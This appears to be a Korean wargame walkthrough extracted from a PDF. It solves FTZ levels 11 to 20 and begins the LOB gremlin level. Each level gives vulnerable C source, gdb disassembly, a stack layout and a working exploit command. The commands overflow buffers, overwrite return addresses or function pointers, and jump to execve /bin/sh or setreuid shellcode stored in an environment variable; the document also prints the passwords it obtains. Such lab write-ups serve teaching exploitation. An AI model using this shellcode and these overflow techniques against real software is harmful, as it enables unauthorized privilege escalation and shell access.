0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1

Size: px
Start display at page:

Download "0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1"

Transcription

1 FTZ LEVEL11 #include <stdio.h> #include <stdlib.h> int main( int argc, char *argv[] ) { char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); gdb 를이용해분석해보면 [level11@ftz level11]$ gdb -q attackme (gdb) set disas main Undefined item: "main". (gdb) set disas intel (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x108 0x <main+9>: sub esp,0x8 0x c <main+12>: push 0xc14 0x <main+17>: push 0xc14 0x <main+22>: call 0x804834c <setreuid> 0x b <main+27>: add esp,0x10 0x e <main+30>: sub esp,0x8 0x <main+33>: mov eax,dword PTR [ebp+12] 0x <main+36>: add eax,0x4 0x <main+39>: push DWORD PTR [eax]

2 0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x10 0x080484a8 <main+56>: sub esp,0xc 0x080484ab <main+59>: lea eax,[ebp-264] 0x080484b1 <main+65>: push eax 0x080484b2 <main+66>: call 0x804833c <printf> 0x080484b7 <main+71>: add esp,0x10 0x080484ba <main+74>: leave 0x080484bb <main+75>: ret 0x080484bc <main+76>: nop 0x080484bd <main+77>: nop 0x080484be <main+78>: nop 0x080484bf <main+79>: nop End of assembler dump. main+48에서 <strcpy> 를콜하므로그전에넣을인자값을셋팅해야한다. <strcpy> 의인자값에 str[] 이있기때문에 str의시작은 ebp-264 지점이다. 따라서메모리구조는 str[256] dummy[8] sfp ret 환경변수를이용하여쉘코드를넣고쉘코드의시작주소를 ret에넣으면된다. getenv.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { char *p; p = getenv(argv[1]);

3 if(p!= NULL) { printf("%s=%p\n",argv[1],p); return 0; 이 C 코드는입력한환경변수의주소를알려주는코드이다. 환경변수를추가시키고 [level11@ftz tmp]$ export EGG="`python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`" 환경변수의주소를알아내면 [level11@ftz tmp]$./getenv EGG EGG=0xbffffc37 이제문제를풀면 쓰레기값 \x37\xfc\xff\xbf [level11@ftz level11]$./attackme `python -c "print 'A'*268+'\x37\xfc\xff\xbf'"` sh-2.05b$ my-pass TERM environment variable not set. Level12 Password is "it is like this".

4 FTZ LEVEL12 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main( void ) { char str[256]; setreuid( 3093, 3093 ); printf( " 문장을입력하세요.\n" ); gets( str ); printf( "%s\n", str ); gdb 를이용해분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x108 0x <main+9>: sub esp,0x8 0x c <main+12>: push 0xc15 0x <main+17>: push 0xc15 0x <main+22>: call 0x804835c <setreuid> 0x b <main+27>: add esp,0x10 0x e <main+30>: sub esp,0xc 0x <main+33>: push 0x x <main+38>: call 0x804834c <printf> 0x b <main+43>: add esp,0x10 0x e <main+46>: sub esp,0xc 0x080484a1 <main+49>: lea eax,[ebp-264] 0x080484a7 <main+55>: push eax

5 0x080484a8 <main+56>: call 0x804831c <gets> 0x080484ad <main+61>: add esp,0x10 0x080484b0 <main+64>: sub esp,0x8 0x080484b3 <main+67>: lea eax,[ebp-264] 0x080484b9 <main+73>: push eax 0x080484ba <main+74>: push 0x804854c 0x080484bf <main+79>: call 0x804834c <printf> 0x080484c4 <main+84>: add esp,0x10 0x080484c7 <main+87>: leave 0x080484c8 <main+88>: ret 0x080484c9 <main+89>: lea esi,[esi] 0x080484cc <main+92>: nop 0x080484cd <main+93>: nop 0x080484ce <main+94>: nop 0x080484cf <main+95>: nop End of assembler dump. 메모리구조를그리면 str[256] dummy[8] sfp ret 쓰레기값268 + 쉘주소똑같이환경변수를이용해풀면 (... 생략...) [level12@ftz level12]$ /tmp/ge EGG EGG=0xbffffc3d gets 를이용해입력을받기때문에파이프를이용해야한다. [level12@ftz level12]$ (python -c "print 'A'*268+'\x3d\xfc\xff\xbf'";cat)./attackme 문장을입력하세요. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

6 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=? my-pass TERM environment variable not set. Level13 Password is "have no clue". FTZ LEVEL13 #include <stdlib.h> main(int argc, char *argv[]) { long i=0x ; char buf[1024]; setreuid( 3094, 3094 ); if(argc > 1) strcpy(buf,argv[1]); if(i!= 0x ) { printf(" Warnning: Buffer Overflow!!! \n"); kill(0,11); gdb 를이용히여 (gdb) disas main Dump of assembler code for function main: 0x080484a0 <main+0>: push ebp 0x080484a1 <main+1>: mov ebp,esp 0x080484a3 <main+3>: sub esp,0x418 0x080484a9 <main+9>: mov DWORD PTR [ebp-12],0x x080484b0 <main+16>: sub esp,0x8

7 0x080484b3 <main+19>: push 0xc16 0x080484b8 <main+24>: push 0xc16 0x080484bd <main+29>: call 0x <setreuid> 0x080484c2 <main+34>: add esp,0x10 0x080484c5 <main+37>: cmp DWORD PTR [ebp+8],0x1 0x080484c9 <main+41>: jle 0x80484e5 <main+69> 0x080484cb <main+43>: sub esp,0x8 0x080484ce <main+46>: mov eax,dword PTR [ebp+12] 0x080484d1 <main+49>: add eax,0x4 0x080484d4 <main+52>: push DWORD PTR [eax] 0x080484d6 <main+54>: lea eax,[ebp-1048] 0x080484dc <main+60>: push eax 0x080484dd <main+61>: call 0x <strcpy> 0x080484e2 <main+66>: add esp,0x10 0x080484e5 <main+69>: cmp DWORD PTR [ebp-12],0x x080484ec <main+76>: je 0x804850d <main+109> 0x080484ee <main+78>: sub esp,0xc 0x080484f1 <main+81>: push 0x80485a0 0x080484f6 <main+86>: call 0x <printf> 0x080484fb <main+91>: add esp,0x10 0x080484fe <main+94>: sub esp,0x8 0x <main+97>: push 0xb 0x <main+99>: push 0x0 0x <main+101>: call 0x <kill> 0x a <main+106>: add esp,0x10 0x d <main+109>: leave 0x e <main+110>: ret 0x f <main+111>: nop End of assembler dump. ebp-12 부분이 0x 이아니라면프로그램이종료된다. 따라서환경변 수를이용해쉘코드의주소를구한다음 ebp-12 부분에 0x 를넣어주 면된다.

8 환경변수를이용해주소를구하면 (... 생략...) level13]$ /tmp/ge EGG EGG=0xbffffc3d 메모리구조를보면 buf[1024] dummy[12] i[4] dummy[8] sfp ret 쓰레기값 \x67\x45\x23\x01 + 쓰레기값12 + 쉘주소공격을하면 [level13@ftz level13]$./attackme `python -c "print 'A'*1036+'\x67\x45\x23\x01'+'A'*12+'\x3d\xfc\xff\xbf'"` sh-2.05b$ my-pass TERM environment variable not set. Level14 Password is "what that nigga want?". FTZ LEVEL14 #include <stdio.h> #include <unistd.h> main() { int crap; int check; char buf[20]; fgets(buf,45,stdin); if (check==0xdeadbeef) { setreuid(3095,3095); system("/bin/sh"); C 언어코드를보니 fgets 를이용하여입력을받는데 45byte 만큼의데이터를 받아버퍼오버플로우가일어난다. 그리고 if 문에서 deadbeef 를검사한

9 다. gdb를이용하여분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x38 0x <main+6>: sub esp,0x4 0x <main+9>: push ds:0x x f <main+15>: push 0x2d 0x080484a1 <main+17>: lea eax,[ebp-56] 0x080484a4 <main+20>: push eax 0x080484a5 <main+21>: call 0x <fgets> 0x080484aa <main+26>: add esp,0x10 0x080484ad <main+29>: cmp DWORD PTR [ebp-16],0xdeadbeef 0x080484b4 <main+36>: jne 0x80484db <main+75> 0x080484b6 <main+38>: sub esp,0x8 0x080484b9 <main+41>: push 0xc17 0x080484be <main+46>: push 0xc17 0x080484c3 <main+51>: call 0x <setreuid> 0x080484c8 <main+56>: add esp,0x10 0x080484cb <main+59>: sub esp,0xc 0x080484ce <main+62>: push 0x x080484d3 <main+67>: call 0x <system> 0x080484d8 <main+72>: add esp,0x10 0x080484db <main+75>: leave 0x080484dc <main+76>: ret 0x080484dd <main+77>: lea esi,[esi] End of assembler dump. fgets의인자중에 buf가있으므로 main+17부분에서 buf를불러온다. 이때 buf의시작은 ebp-56인것을알수있다. main+29 부분에서 ebp-16과 deadbeef 를비교하므로 ebp-16부분에 deadbeef 를넣으면쉘을딸수있다.

10 메모리구조를그려보면 buf[20] dummy[20] deadbeef dummy[12] sfp ret 쓰레기값40 + \xef\xbe\xad\xde 공격을하면 [level14@ftz level14]$ (python -c "print 'A'*40+'\xef\xbe\xad\xde'";cat)./attackme my-pass Level15 Password is "guess what". FTZ LEVEL15 #include <stdio.h> main() { int crap; int *check; char buf[20]; fgets(buf,45,stdin); if (*check==0xdeadbeef) { setreuid(3096,3096); system("/bin/sh"); 전문제와굉장히비슷한문제인데다른점이 check 가포인터가되었다는 것이다 그래도 gdb 로분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp

11 0x <main+3>: sub esp,0x38 0x <main+6>: sub esp,0x4 0x <main+9>: push ds:0x x f <main+15>: push 0x2d 0x080484a1 <main+17>: lea eax,[ebp-56] 0x080484a4 <main+20>: push eax 0x080484a5 <main+21>: call 0x <fgets> 0x080484aa <main+26>: add esp,0x10 0x080484ad <main+29>: mov eax,dword PTR [ebp-16] 0x080484b0 <main+32>: cmp DWORD PTR [eax],0xdeadbeef 0x080484b6 <main+38>: jne 0x80484dd <main+77> 0x080484b8 <main+40>: sub esp,0x8 0x080484bb <main+43>: push 0xc18 0x080484c0 <main+48>: push 0xc18 0x080484c5 <main+53>: call 0x <setreuid> 0x080484ca <main+58>: add esp,0x10 0x080484cd <main+61>: sub esp,0xc 0x080484d0 <main+64>: push 0x x080484d5 <main+69>: call 0x <system> 0x080484da <main+74>: add esp,0x10 0x080484dd <main+77>: leave 0x080484de <main+78>: ret 0x080484df <main+79>: nop End of assembler dump. level14와다똑같은데 main+29지점에서주소에있는값을비교하므로메모리안에있는 deadbeef를 ebp-16이그곳을가리키도록주소를넣어주면된다. 메모리구조를그려보면 buf[20] dummy[20] deadbeef의주소값 dummy[12] sfp ret 쓰레기값40 + deadbeef의주소값 이번공격에서는 cmp 로비교하는구문근처에서 deadbeef 을찾아시작주소 를 ebp-16 지점에넣겠다.

12 (gdb) x/16x 0x080484b0 0x80484b0 <main+32>: 0xbeef3881 0x2575dead 0x6808ec83 0x00000c18 0x80484c0 <main+48>: 0x000c1868 0xfeb6e800 0xc483ffff 0x0cec8310 0x80484d0 <main+64>: 0x xfe66e808 0xc483ffff 0x90c3c910 (gdb) x/16x 0x080484b2 0x80484b2 <main+34>: 0xdeadbeef 0xec x0c x x80484c2 <main+50>: 0xe800000c 0xfffffeb6 0x8310c483 0x48680cec 0x80484d2 <main+66>: 0xe xfffffe66 0xc910c483 0x895590c3 deadbeef 의주소가 0x080484b2 라는것을알았다. 공격을하면 level15]$ (python -c "print 'A'*40+'\xb2\x84\x04\x08'";cat)./attackme my-pass Level16 Password is "about to cause mass". FTZ LEVEL16 #include <stdio.h> void shell() { setreuid(3097,3097); system("/bin/sh"); void printit() { printf("hello there!\n"); main() { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); call(); shell() 함수의시작주소를 call() 함수를호출하는곳에넣으면쉘을획득할수있을것같다.

13 gdb 를이용해서분석을해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x b <main+3>: sub esp,0x38 0x e <main+6>: mov DWORD PTR [ebp-16],0x x <main+13>: sub esp,0x4 0x <main+16>: push ds:0x80496e8 0x e <main+22>: push 0x30 0x <main+24>: lea eax,[ebp-56] 0x <main+27>: push eax 0x <main+28>: call 0x <fgets> 0x <main+33>: add esp,0x10 0x c <main+36>: mov eax,dword PTR [ebp-16] 0x f <main+39>: call eax 0x <main+41>: leave 0x <main+42>: ret 0x <main+43>: nop 0x <main+44>: nop 0x <main+45>: nop 0x <main+46>: nop 0x <main+47>: nop 0x <main+48>: nop 0x <main+49>: nop 0x a <main+50>: nop 0x b <main+51>: nop 0x c <main+52>: nop 0x d <main+53>: nop 0x e <main+54>: nop 0x f <main+55>: nop End of assembler dump. buf의시작주소는 ebp-56이고, main+6 부분에서 printit 함수의주소를 ebp-16부분에넣고있고, main+36에서 ebp-16부분에있는값을 eax에넣고 call 한다. 따라서 ebp-16부분에 shell() 함수의시작주소를넣고익스플로잇하겠다.

14 (gdb) disas shell Dump of assembler code for function shell: 0x080484d0 <shell+0>: push ebp 0x080484d1 <shell+1>: mov ebp,esp 0x080484d3 <shell+3>: sub esp,0x8 0x080484d6 <shell+6>: sub esp,0x8 0x080484d9 <shell+9>: push 0xc19 0x080484de <shell+14>: push 0xc19 0x080484e3 <shell+19>: call 0x80483b4 <setreuid> 0x080484e8 <shell+24>: add esp,0x10 0x080484eb <shell+27>: sub esp,0xc 0x080484ee <shell+30>: push 0x80485b8 0x080484f3 <shell+35>: call 0x <system> 0x080484f8 <shell+40>: add esp,0x10 0x080484fb <shell+43>: leave 0x080484fc <shell+44>: ret 0x080484fd <shell+45>: lea esi,[esi] End of assembler dump. shell 의시작주소는 0x080484d0 이다. 쓰레기값 40 + shell() 의시작주소 공격을하면 [level16@ftz level16]$ (python -c "print 'A'*40+'\xd0\x84\x04\x08'";cat)./attackme my-pass Level17 Password is "king poetic". FTZ LEVEL17 #include <stdio.h> void printit() { printf("hello there!\n"); main()

15 { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); setreuid(3098,3098); call(); 저번문제와달리 shell() 함수가없어져서직접쉘코드를환경변수에올려서 call() 함수를호출하는부분을 shellcode의시작주소로바꾸겠다. 환경변수를올려주소를찾아보겠다. 주소를찾는코드는위에있으니참고해서구하겠다. level17]$ export EGG="`python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`" level17]$ /tmp/ge EGG EGG=0xbffffc3d 그럼이제 gdb 를이용해서분석해보면 (gdb) disas main Dump of assembler code for function main: 0x080484a8 <main+0>: push ebp 0x080484a9 <main+1>: mov ebp,esp 0x080484ab <main+3>: sub esp,0x38 0x080484ae <main+6>: mov DWORD PTR [ebp-16],0x x080484b5 <main+13>: sub esp,0x4 0x080484b8 <main+16>: push ds:0x804967c 0x080484be <main+22>: push 0x30 0x080484c0 <main+24>: lea eax,[ebp-56] 0x080484c3 <main+27>: push eax 0x080484c4 <main+28>: call 0x <fgets> 0x080484c9 <main+33>: add esp,0x10 0x080484cc <main+36>: sub esp,0x8 0x080484cf <main+39>: push 0xc1a 0x080484d4 <main+44>: push 0xc1a 0x080484d9 <main+49>: call 0x <setreuid> 0x080484de <main+54>: add esp,0x10 0x080484e1 <main+57>: mov eax,dword PTR [ebp-16] 0x080484e4 <main+60>: call eax

16 0x080484e6 <main+62>: leave 0x080484e7 <main+63>: ret 0x080484e8 <main+64>: nop 0x080484e9 <main+65>: nop 0x080484ea <main+66>: nop 0x080484eb <main+67>: nop 0x080484ec <main+68>: nop 0x080484ed <main+69>: nop 0x080484ee <main+70>: nop 0x080484ef <main+71>: nop End of assembler dump. printit() 함수의주소가 ebp-16에올라가고, buf는 ebp-56에올라간다. 따라서환경변수의주소를 ebp-16에넣어주면쉽게풀릴것같다. 쓰레기값 40 + 환경변수주소 공격을하면 [level17@ftz level17]$ (python -c "print 'A'*40+'\x3d\xfc\xff\xbf'";cat)./attackme my-pass TERM environment variable not set. Level18 Password is "why did you do it". FTZ LEVEL18 #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> void shellout(void); int main() { char string[100]; int check; int x = 0; int count = 0; fd_set fds; printf("enter your command: "); fflush(stdout); while(1)

17 { if(count >= 100) printf("what are you trying to do?\n"); if(check == 0xdeadbeef) shellout(); else { FD_ZERO(&fds); FD_SET(STDIN_FILENO,&fds); if(select(fd_setsize, &fds, NULL, NULL, NULL) >= 1) { if(fd_isset(fileno(stdin),&fds)) { read(fileno(stdin),&x,1); switch(x) { case '\r': case '\n': printf("\a"); break; case 0x08: count--; printf("\b \b"); break; default: string[count] = x; count++; break; void shellout(void) { setreuid(3099,3099); execl("/bin/sh","sh",null);

18 여러 c코드들이있지만 string 배열보다 check가늦게선언되어스택의특성상 check 부분을원하는값으로덮는것이불가능하다. 하지만 case문에서 0x08이 count를 해주고, defalut에서 string[count] 에 x를넣어준다. 따라서 count를음수로잡으면 string전에있는메모리도변조할수있을것이다. gdb 를이용해분석을해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x100 0x <main+9>: push edi 0x a <main+10>: push esi 0x b <main+11>: push ebx 0x c <main+12>: mov DWORD PTR [ebp-108],0x0 0x <main+19>: mov DWORD PTR [ebp-112],0x0 0x a <main+26>: push 0x x f <main+31>: call 0x <printf> 0x <main+36>: add esp,0x4 0x <main+39>: mov eax,ds:0x804993c 0x c <main+44>: mov DWORD PTR [ebp-252],eax 0x <main+50>: mov ecx,dword PTR [ebp-252] 0x <main+56>: push ecx 0x <main+57>: call 0x <fflush> 0x e <main+62>: add esp,0x4 0x <main+65>: jmp 0x <main+72> 0x <main+67>: jmp 0x <main+549> 0x <main+72>: cmp DWORD PTR [ebp-112],0x63 0x c <main+76>: jle 0x80485ab <main+91> 0x e <main+78>: push 0x x080485a3 <main+83>: call 0x <printf> 0x080485a8 <main+88>: add esp,0x4 0x080485ab <main+91>: cmp DWORD PTR [ebp-104],0xdeadbeef 0x080485b2 <main+98>: jne 0x80485c0 <main+112> 0x080485b4 <main+100>: call 0x <shellout> 0x080485b9 <main+105>: jmp 0x <main+544>

19 0x080485be <main+110>: mov esi,esi 0x080485c0 <main+112>: lea edi,[ebp-240] 0x080485c6 <main+118>: mov DWORD PTR [ebp-252],edi 0x080485cc <main+124>: mov ecx,0x20 0x080485d1 <main+129>: mov edi,dword PTR [ebp-252] 0x080485d7 <main+135>: xor eax,eax 0x080485d9 <main+137>: cld 0x080485da <main+138>: repz stos es:[edi],eax 0x080485dc <main+140>: mov DWORD PTR [ebp-244],ecx ---Type <return> to continue, or q <return> to quit--- 0x080485e2 <main+146>: mov DWORD PTR [ebp-248],edi 0x080485e8 <main+152>: jmp 0x80485f2 <main+162> 0x080485ea <main+154>: lea esi,[esi] 0x080485f0 <main+160>: jmp 0x80485c0 <main+112> 0x080485f2 <main+162>: xor eax,eax 0x080485f4 <main+164>: bts DWORD PTR [ebp-240],eax 0x080485fb <main+171>: push 0x0 0x080485fd <main+173>: push 0x0 0x080485ff <main+175>: push 0x0 0x <main+177>: lea ecx,[ebp-240] 0x <main+183>: mov DWORD PTR [ebp-252],ecx 0x d <main+189>: mov edi,dword PTR [ebp-252] 0x <main+195>: push edi 0x <main+196>: push 0x400 0x <main+201>: call 0x <select> 0x e <main+206>: add esp,0x14 0x <main+209>: mov DWORD PTR [ebp-252],eax 0x <main+215>: cmp DWORD PTR [ebp-252],0x0 0x e <main+222>: jle 0x <main+544> 0x <main+228>: mov eax,ds:0x x <main+233>: mov DWORD PTR [ebp-252],eax 0x f <main+239>: mov ecx,dword PTR [ebp-252] 0x <main+245>: push ecx 0x <main+246>: call 0x <fileno> 0x b <main+251>: add esp,0x4 0x e <main+254>: mov DWORD PTR [ebp-252],eax 0x <main+260>: mov esi,dword PTR [ebp-252] 0x a <main+266>: and esi,0x1f 0x d <main+269>: mov edi,ds:0x x <main+275>: mov DWORD PTR [ebp-252],edi

20 0x <main+281>: mov eax,dword PTR [ebp-252] 0x f <main+287>: push eax 0x <main+288>: call 0x <fileno> 0x <main+293>: add esp,0x4 0x <main+296>: mov DWORD PTR [ebp-252],eax 0x e <main+302>: mov edx,dword PTR [ebp-252] 0x <main+308>: shr edx,0x5 0x <main+311>: lea ecx,[edx*4] ---Type <return> to continue, or q <return> to quit--- 0x e <main+318>: mov DWORD PTR [ebp-252],ecx 0x <main+324>: lea edx,[ebp-240] 0x a <main+330>: mov edi,dword PTR [ebp-252] 0x080486a0 <main+336>: bt DWORD PTR [edi+edx],esi 0x080486a4 <main+340>: setb bl 0x080486a7 <main+343>: test bl,bl 0x080486a9 <main+345>: je 0x <main+544> 0x080486af <main+351>: push 0x1 0x080486b1 <main+353>: lea eax,[ebp-108] 0x080486b4 <main+356>: mov DWORD PTR [ebp-252],eax 0x080486ba <main+362>: mov ecx,dword PTR [ebp-252] 0x080486c0 <main+368>: push ecx 0x080486c1 <main+369>: mov edi,ds:0x x080486c7 <main+375>: mov DWORD PTR [ebp-252],edi 0x080486cd <main+381>: mov eax,dword PTR [ebp-252] 0x080486d3 <main+387>: push eax 0x080486d4 <main+388>: call 0x <fileno> 0x080486d9 <main+393>: add esp,0x4 0x080486dc <main+396>: mov DWORD PTR [ebp-252],eax 0x080486e2 <main+402>: mov ecx,dword PTR [ebp-252] 0x080486e8 <main+408>: push ecx 0x080486e9 <main+409>: call 0x <read> 0x080486ee <main+414>: add esp,0xc 0x080486f1 <main+417>: mov edi,dword PTR [ebp-108] 0x080486f4 <main+420>: mov DWORD PTR [ebp-252],edi 0x080486fa <main+426>: cmp DWORD PTR [ebp-252],0xa 0x <main+433>: je 0x <main+466> 0x <main+435>: cmp DWORD PTR [ebp-252],0xa 0x a <main+442>: jg 0x <main+455> 0x c <main+444>: cmp DWORD PTR [ebp-252],0x8 0x <main+451>: je 0x <main+481>

21 0x <main+453>: jmp 0x <main+499> 0x <main+455>: cmp DWORD PTR [ebp-252],0xd 0x e <main+462>: je 0x <main+466> 0x <main+464>: jmp 0x <main+499> 0x <main+466>: push 0x x <main+471>: call 0x <printf> 0x c <main+476>: add esp,0x4 ---Type <return> to continue, or q <return> to quit--- 0x f <main+479>: jmp 0x <main+544> 0x <main+481>: dec DWORD PTR [ebp-112] 0x <main+484>: push 0x x <main+489>: call 0x <printf> 0x e <main+494>: add esp,0x4 0x <main+497>: jmp 0x <main+544> 0x <main+499>: lea eax,[ebp-100] 0x <main+502>: mov DWORD PTR [ebp-252],eax 0x c <main+508>: mov edx,dword PTR [ebp-112] 0x f <main+511>: mov cl,byte PTR [ebp-108] 0x <main+514>: mov BYTE PTR [ebp-253],cl 0x <main+520>: mov al,byte PTR [ebp-253] 0x e <main+526>: mov ecx,dword PTR [ebp-252] 0x <main+532>: mov BYTE PTR [edx+ecx],al 0x <main+535>: inc DWORD PTR [ebp-112] 0x a <main+538>: jmp 0x <main+544> 0x c <main+540>: lea esi,[esi*1] 0x <main+544>: jmp 0x <main+65> 0x <main+549>: lea esp,[ebp-268] 0x b <main+555>: pop ebx 0x c <main+556>: pop esi 0x d <main+557>: pop edi 0x e <main+558>: leave 0x f <main+559>: ret End of assembler dump. 코드가긴만큼어셈코드도굉장히길다. 하지만우리에게필요한것은 string의시작, check의시작, shellout() 함수의시작부분이다. 우선우리가필요한코드만잘라보겠다. 0x b <main+11>: push ebx 0x c <main+12>: mov DWORD PTR [ebp-108],0x0 0x <main+19>: mov DWORD PTR [ebp-112],0x0 0x a <main+26>: push 0x

22 ebp-108 부분과 ebp-112 부분을 0 으로초기화시키고있다. c 코드와비교해 서보면 ebp-108 는 x 이고,ebp-112 는 count 라는것을알수있다. 0x080485a3 <main+83>: call 0x <printf> 0x080485a8 <main+88>: add esp,0x4 0x080485ab <main+91>: cmp DWORD PTR [ebp-104],0xdeadbeef 0x080485b2 <main+98>: jne 0x80485c0 <main+112> 0x080485b4 <main+100>: call 0x <shellout> deadbeef에서비교하는 main+91 부분에서 check가 ebp-104부분이라는것을알았다. 0x <main+499>: lea eax,[ebp-100] 0x <main+502>: mov DWORD PTR [ebp-252],eax 0x c <main+508>: mov edx,dword PTR [ebp-112] 0x f <main+511>: mov cl,byte PTR [ebp-108] 0x <main+514>: mov BYTE PTR [ebp-253],cl 0x <main+520>: mov al,byte PTR [ebp-253] 0x e <main+526>: mov ecx,dword PTR [ebp-252] 0x <main+532>: mov BYTE PTR [edx+ecx],al 0x <main+535>: inc DWORD PTR [ebp-112] 0x a <main+538>: jmp 0x <main+544> switch문안에있는 default문이다. 여기서 string이 ebp-100에위치한다는것을알았다. eax에 string을넣고, string을다시 ebp-252부분에넣는다. 그다음 count를 edx에넣고, x를 cl에넣는다. 현재 eax와 ebp-252 부분에는 string이, edx에는 count가, cl에는 x가들어가있다. 그다음 cl을 ebp-253에넣고다시 ebp-253을 al에넣는다. 다음 ebp-252를 ecx에넣는다. 그럼현재 eax와 ebp-252,ecx 부분에는 string이, edx에는 count가, cl, ebp-253, al에는 x가들어가있다. main+532 부분에서 string의 count 번째수에 x를넣어준다. 어셈블리어에서배열에값를넣을때는어셈명령어 mov를쓰고넣는값의크기에따라 1byte면 BYTE PTR, 2byte면 WRORD PTR,4byte면 DWORD PTR라고쓴다. 그다음 [ 넣는번째 + 배열이름 ], 넣는값형식으로쓴다. 여태까지수집한정보를정리하면 string : ebp-100, count : ebp-112, x : ebp-108,

23 check : ebp-104 string 에입력을받을때 count 를 4 줄이고그부분에 deadbeef 를넣으면되 겠다. \x08 * 4 + shellout() 함수의시작주소 공격을해보겠다. [level18@ftz level18]$ (python -c "print '\x08'*4+'\xef\xbe\xad\xde'";cat)./attackme Enter your command: id uid=3099(level19) gid=3098(level18) groups=3098(level18) my-pass Level19 Password is "swimming in pink". FTZ LEVEL19 main() { char buf[20]; gets(buf); printf("%s\n",buf); 코드가굉장히간단하다. 하지만그전까지는 c코드에서권한상승을 setreuid를해주었다. 하지만이코드에는권한상승이없다. 여태까지사용했던쉘코드는단순히 /bin/sh 명령어를실행시켜주는것이였으므로 setreuid+/bin/sh 를해주는쉘코드를사용하겠다. 사용한쉘코드는이것이다. \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2 f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 이쉘코드를환경변수에올린다음주소로 ret 를덮겠다. 환경변수를등록해주소를아는과정은생략하겠다. 앞에나온 level 의과 정을따라하면된다.

24 gdb 를이용해분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x28 0x <main+6>: sub esp,0xc 0x <main+9>: lea eax,[ebp-40] 0x c <main+12>: push eax 0x d <main+13>: call 0x80482f4 <gets> 0x <main+18>: add esp,0x10 0x <main+21>: sub esp,0x8 0x <main+24>: lea eax,[ebp-40] 0x b <main+27>: push eax 0x c <main+28>: push 0x80484d8 0x <main+33>: call 0x <printf> 0x <main+38>: add esp,0x10 0x <main+41>: leave 0x a <main+42>: ret 0x b <main+43>: nop 0x c <main+44>: nop 0x d <main+45>: nop 0x e <main+46>: nop 0x f <main+47>: nop End of assembler dump. buf 의위치가 ebp-40 이라는것을알았다. 쓰레기값 44 + 환경변수 EGG 의주소 공격을해보면 [level19@ftz level19]$ (python -c "print 'A'*44+'\x2d\xfc\xff\xbf'";cat)./attackme AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-? my-pass TERM environment variable not set. Level20 Password is "we are just regular guys".

25 FTZ LEVEL20 #include <stdio.h> main(int argc,char **argv) { char bleh[80]; setreuid(3101,3101); fgets(bleh,79,stdin); printf(bleh); bleh의크기가 80인데 fgets를이용해서 79만큼을입력받는다. 따라서 bof 공격은아니라는것을알았다. 이번문제는포맷스트링버그를이용한공격인것같다. printf() 함수를특별한서식문자를사용하지않고출력을하고있다. LOB (gate -> gremlin) /* */ The Lord of the BOF : The Fellowship of the BOF - gremlin - simple BOF int main(int argc, char *argv[]) { char buffer[256]; if(argc < 2){ printf("argv error\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); 전형적인 BOF 문제이다. main함수의인자가 2개이하면프로그램이종료된다. 환경변수에쉘코드를넣은후 buffer와 sfp를덮고환경변수의주소로 ret를덮겠다. 환경변수를넣는것은많이했으므로따로설명하지는않겠다. 위에있다. [gate@localhost gate]$ /tmp/ge EGG

